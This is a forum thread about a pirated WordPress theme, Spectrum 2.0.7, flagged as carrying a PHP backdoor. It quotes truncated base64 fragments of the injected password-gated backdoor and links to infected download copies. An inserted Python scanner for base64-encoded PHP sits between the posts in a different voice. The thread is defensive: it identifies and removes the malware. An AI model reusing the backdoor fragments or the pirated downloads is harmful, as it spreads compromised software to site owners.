
12-02-2016, 07:36 AM (This post was last modified: 12-02-2016 07:39 AM by Saunders412.)
Post: #1
[Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)

SALES: https://themeforest.net/item/spectrum-mu...e/10259946

DOWNLOAD: http://www107.zippyshare.com/v/eU1vBrke/file.html


https://virustotal.com/en/file/4ca6b64fb.../analysis/
File name: wp_spectrum.zip
Detection ratio: 2 / 52
Analysis date: 2016-12-01 19:23:49 UTC ( 2 hours, 1 minute ago )

VIRUS FOUND
DrWeb PHP.BackDoor.62 20161201
Jiangmin TrojanDownloader.JS.awni 20161201

Narrowed to this infected file
spectrum v2.0.7\spectrum\wp_spectrum_2.0.7\admin\ReduxCore\framework-functions.php

Is there anyone that might be able to help me clean this file up and remove the malware so that this theme works? This is a really good theme.

This doesn't look right, but not sure exactly what to remove in the framework-functions.php file.

(Line 9) $GLOBALS['WP_CD_CODE'] = 'PD9waHANCg0KLy9pbnN0YWxsX2NvZ........
(Line 86) $install_code = 'PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3B​hc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7Cgk​Jc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzs​KCQkJCQlmb3JlYWNoICgkd3BkYi0

(When I remove these 2 lines and run it through VirusTotal, TrojanDownloader.JS.awni is no longer found. But I still get the PHP.Backdoor.62.)

I have read somewhere that this could be related to base64_decode but not sure.

Would really appreciate if anyone could help me. I would totally send you reps...
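Both assignments quoted in post #1 begin with `PD9waHA`, which is the base64 encoding of `<?php`, so the base64 question can be checked statically without running the theme. The following is an added example, not part of any post in this thread: a Python scanner that flags PHP string literals which decode to PHP source. The function names and the sample input are constructed for illustration.

```python
import base64
import re
from pathlib import Path

# Quoted PHP string literal made only of base64 characters, 16 or more long.
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{16,}={0,2})\1""")
PHP_OPEN_TAGS = (b"<?php", b"<?=")

def decode_prefix(blob, nbytes=48):
    """Decode only the head of a base64 literal; enough to see what it hides."""
    head = blob[: ((nbytes + 2) // 3) * 4]
    head = head[: len(head) - len(head) % 4]  # keep whole 4-character groups
    try:
        return base64.b64decode(head, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return b""

def scan_php_source(text):
    """Return (line_no, literal_length, decoded_head) per embedded PHP payload."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in B64_LITERAL.finditer(line):
            head = decode_prefix(match.group(2))
            if head.lstrip().startswith(PHP_OPEN_TAGS):
                hits.append((line_no, len(match.group(2)), head[:24]))
    return hits

def scan_tree(root):
    """Scan every .php file under root; returns {path: hits} for flagged files."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample: a harmless payload stored the same way as the quoted lines.
_PAYLOAD = base64.b64encode(b"<?php\n\n// constructed stand-in\necho 'x';\n").decode()
SAMPLE = (
    "<?php\n"
    "$title = 'Spectrum';\n"
    "$logo = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB';\n"  # base64 PNG header, not PHP
    f"$GLOBALS['WP_CD_CODE'] = '{_PAYLOAD}';\n"
)

if __name__ == "__main__":
    for line_no, length, head in scan_php_source(SAMPLE):
        print(f"line {line_no}: {length}-char literal decodes to {head!r}")
```

Run `scan_tree()` over the unpacked archive rather than a single file, since a hit in one file says nothing about the rest of the package.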
12-02-2016, 06:55 PM
Post: #2
RE: [Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)
https://www.virustotal.com/en/file/b27cf.../analysis/

2 virus
12-02-2016, 10:13 PM
Post: #3
RE: [Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)
(12-02-2016 06:55 PM)scriptos888 Wrote:  https://www.virustotal.com/en/file/b27cf.../analysis/

2 virus

Yes, I am aware of the 2 viruses. If you read my comment above, this is already outlined. Are you able to help?
12-03-2016, 01:54 AM
Post: #4
RE: [Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)
That file is not part of the theme. Looks like dlwordpress.com inserted malware. Stay away from that site. Everything has been tampered with.
First thing remove that file. Also remove line 26 from admin/index.php

That should address your problem, but from the looks of it, better not use it. If you already ran the install then your WordPress is pretty much fu cked. Remove everything!
12-03-2016, 05:09 AM
Post: #5
RE: [Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)
(12-03-2016 01:54 AM)bale Wrote:  That file is not part of the theme. Looks like dlwordpress.com inserted malware. Stay away from that site. Everything has been tampered with.
First thing remove that file. Also remove line 26 from admin/index.php

That should address your problem, but from the looks of it, better not use it. If you already ran the install then your WordPress is pretty much fu cked. Remove everything!

Thanks for the information and the tips. I am just going to use an older version. I was testing this in my wamp environment and not planning on using this since it seems that there could be other files that might be tampered.

Thanks again for your help.
12-03-2016, 04:39 PM
Post: #6
RE: [Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)
Code:
v2.0.6

Code:
https://>>>[[[Reported by Members as Site with too Many annoying Pop Ups Ads/ ADWARE ]]]<<</14g2wokw6vpf
12-03-2016, 11:05 PM
Post: #7
RE: [Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)
(12-03-2016 04:39 PM)syseng Wrote:  
Code:
v2.0.6

Code:
https://>>>[[[Reported by Members as Site with too Many annoying Pop Ups Ads/ ADWARE ]]]<<</14g2wokw6vpf

Thanks for posting, do you know where you downloaded this file from? The file looks a little dirty. Any ideas? I am going to use your post and compare it with 2.0.7.

https://www.virustotal.com/en/file/34978...480770039/

Jiangmin TrojanDownloader.JS.awni 20161203
ALYac 20161203
